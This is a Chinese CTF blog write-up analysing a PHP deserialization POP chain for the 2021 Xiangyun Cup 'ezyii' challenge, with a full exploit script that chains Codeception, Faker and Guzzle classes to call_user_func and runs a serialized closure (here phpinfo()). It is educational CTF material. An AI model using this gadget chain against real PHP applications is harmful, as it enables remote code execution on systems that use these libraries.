祥云杯2021 ezyii的反序列化pop链分析

最新推荐文章于 2023-02-11 22:12:17 发布
最新推荐文章于 2023-02-11 22:12:17 发布
阅读量450 收藏
点赞数
分类专栏: CTF 复现 漏洞 文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/119928348
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 4 订阅
订阅专栏
漏洞
7 篇文章 0 订阅
订阅专栏

前言

前几天刚看完祥云杯的题目,做了这道ezyii。当时直接就找到了原本链子的exp直接就拿来用了,没有过多的思考。然而打完这道题目之后,发现后面的题都不太会了(菜狗状。额,那就把这道题的链子好好分析一下吧。
声明:本文的exp及思路来源于这里

POP链分析

在做这道题的时候,根据特征来进行判断,可以看出是上述文章中的第四条链子。下面是我对这个链子的分析过程。
链子的触发点是__destruct()函数也就是下面这个类
在这里插入图片描述
这里调用了stopProcess()函数,那么自然而然地想到__call(),找到__call()之后发现还需要一个__toString(),因为__call()长这个样子
在这里插入图片描述
__toString()函数在AppendStream类里面
在这里插入图片描述
跟进rewind()函数,再跟进seek()函数。
在这里插入图片描述
发现它下面又调用了一次rewind(),这时候发现在其它类里面也存在rewind()函数,这样以rewind()为跳板就可实现两个类的切换了。
在这里插入图片描述
但是在CachingStream这个类中seek()函数调用了read()函数,我们需要跟进看一下
在这里插入图片描述
发现read()里面又调用了read()函数,刚才以rewind()作为跳板,那么这次我们也可以用read()做跳板,因为pumpStream类里面有read()函数
在这里插入图片描述
不仅如此,pumpStream类中有一个最关键的函数pump(),可以看到这个函数在上图中已经调用过了,所以只要进入了read()就会调用pump()。而pump里面有call_user_func()
在这里插入图片描述
好,到此为止我们已经分析出一条可用的路线了
RunProcess类__destruct
DefaultGenerator类__call
AppendStream类__toString
AppendStream类rewind和seek
AppendStream类seek
CachingStream类rewind和seek
CachingStream类seek
CachingStream类read
PumpStream类read
PumpStream类pump
pump函数
call_user_func

exp如下:

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo urlencode(serialize(new RunProcess()));
}

namespace Faker{
    class DefaultGenerator
{
    protected $default;

    public function __construct($default = null)
    {
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){phpinfo();};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}
入山梵行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WP-2021祥云
ce666666的博客
01-16 674
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4318
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
CTF之旅WEB篇(3)--ezunser PHP反序列化
shutTD的博客
10-01 1319
总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!
深入分析祥云easy_yii
sash1mi
08-27 352
深入分析祥云easy_yii 题目描述 yii最新的链子 前置知识 析构函数__destruct 官方解释:析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行 <?php class MyDestructableClass { function __construct() { print "In constructor\n"; $this->name = "MyDestructableClass"; } function __de
[CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)
Landasika的博客
05-17 1335
目录 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)一、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148) 一、什么是Yii 参考官网 https://ww...
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
2020祥云 CTFNu1L.pdf
03-15
6. Python编程:文档中的代码片段是Python语言编写的,Python语言在CTF竞赛中常用于快速编写工具或脚本,进行文件处理或自动化操作。 7. 数据处理:文档中展示了如何读取一个文件(如vhd文件),解析数据并将其以...
0RAYS-祥云writeup .pdf
09-05
这篇writeup涉及的是一个网络安全竞赛,名为"0RAYS-祥云",主要涵盖了安全开发、业务安全、信息安全研究以及安全运营等领域的知识。在比赛中,参赛者需要解决一系列安全问题,包括Web Command命令执行和数据安全。...
第二届祥云 Web 题解1
08-03
### 第二届祥云 Web 题解1 #### 考点解析与知识点梳理 本次题目主要涉及两个核心安全问题:服务器端请求伪造(SSRF)和 session 条件竞争,以及 PHP 反序列化的漏洞利用。接下来,我们将详细探讨这些概念及其在...
祥云智慧农贸一体化解决方案.pptx
01-17
建设目标是改善城市环境和提高人民生活质量为目标,进一步完善农贸市场的监督管理,规范市场...市场信息化管理平台主要由农贸市场管理方使用,包括单个市场的主体信息、合同管理、物业管理、商户管理、数据统计分析。
通过几道CTF题学习yii2框架
最新发布
m0_59598029的博客
02-11 231
Yii是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架,之前的版本存在反序列化漏洞,程序在调用时,攻击者可通过构造特定的恶意请求执行任意命令,本篇就分析一下yii2利用链以及如何自己去构造payload,并结合CTF题目去学习yii2框架。
祥云题解
蚁景网安学院
08-25 2199
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 # bad_cat战队WRITEUP 一、 战队信息 战队名称:bad_cat 战队排名:6 二、 解题情况 三、 解题过程 web **1、**ezyii 网上搜yii的1day https://xz.aliyun.com/t/9948#toc-6 思路类似于第四条链子 exp: <?p.
2021祥云web 部分wp
fmyyy1的博客
08-23 751
ezyii 说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
祥云2020(11.21-22)-CryptoWP
~airrudder~
11-23 3363
文章目录古典密码换位加密栅栏密码(Rail-fence Cipher)列移位密码(Columnar Transposition Cipher)曲路密码(Curve Cipher)单表替换密码凯撒密码(Caesar Cipher)rot13乘法密码仿射密码(Affine Cipher)埃特巴什码(Atbash Cipher)简单替换密码(Simple Substitution Cipher)波利比奥斯方阵密码(Polybius Square Cipher)ADFGX和ADFGVX密码猪圈密码(Pigpen C
[ctf misc][2021祥云初赛]鸣雏恋
ShenZ的博客
08-23 685
刚刚立了flag我就出了人生中的第二题(和队友一起想的,他一直不放弃,要不是他我早躺着了),ps现在在想要不要放弃web转misc [2021祥云初赛]鸣雏恋 附件: 鸣雏恋_2dad763070b79f50c4635a906359909a.zip 解压得 鸣雏恋.docx 1.压缩包处理 发现是zip,改后缀 其实打开还是可以正常看word的,其实普通的word也可以用解压缩软件看,word是有自己的格式的 改后缀rar得到love.zip和key.txt key.txt是零宽字符隐写,
祥云2021 Web简单题wp
feng的博客
08-23 593
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单题
yii2框架学习笔记四
taotaobaobei的博客
07-21 278
yii 验证码使用 1.控制器中配置 public function actions(){ return [ 'captcha'=>[ 'class'=>'yii\captcha\CaptchaAction', 'fixedVerifyCode'=>YII_ENV_TEST ? 'testme':null...
PHP反序列化&POP链的构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2771
网上关与PHP反序列化&POP链构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
祥云Web题解:深入探讨SSRF与Yii框架反序列化漏洞
"第二届祥云 Web 题解1 - 考察 SSRF、session 条件竞争以及 PHP 反序列化利用" 在此次祥云网络安全竞赛中,题目涉及了三个主要知识点:SSRF(Server-Side Request Forgery)、session 条件竞争以及 PHP 反序列...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值